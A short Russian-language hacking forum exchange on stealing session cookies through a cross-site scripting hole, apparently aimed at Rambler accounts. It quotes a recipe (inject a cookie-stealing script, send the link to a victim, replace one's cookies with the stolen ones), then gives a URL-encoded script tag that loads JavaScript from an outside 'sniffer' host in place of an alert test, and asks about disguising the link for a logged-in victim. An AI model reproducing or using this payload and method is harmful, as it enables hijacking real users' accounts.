Цитата:

Сообщение от vonkolot

есть xss...ты к ней добавляешь скрипт кражы куков..отправляшь жертве...куки приходят..ты их меняешь..и вуаля

Значит есть xss

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



заместо скрипа алерта вставляем скрипт кражи %3CSCRIPT type=text/javascript src=http://httpz.ru/wn05gmtt78go.js>" это с здешнешго онлайн снифера,так?

дальше маскировка и отправка жертве, которая должна быть авторизована и открывать она должна непосредственно с рамблера. Все верно?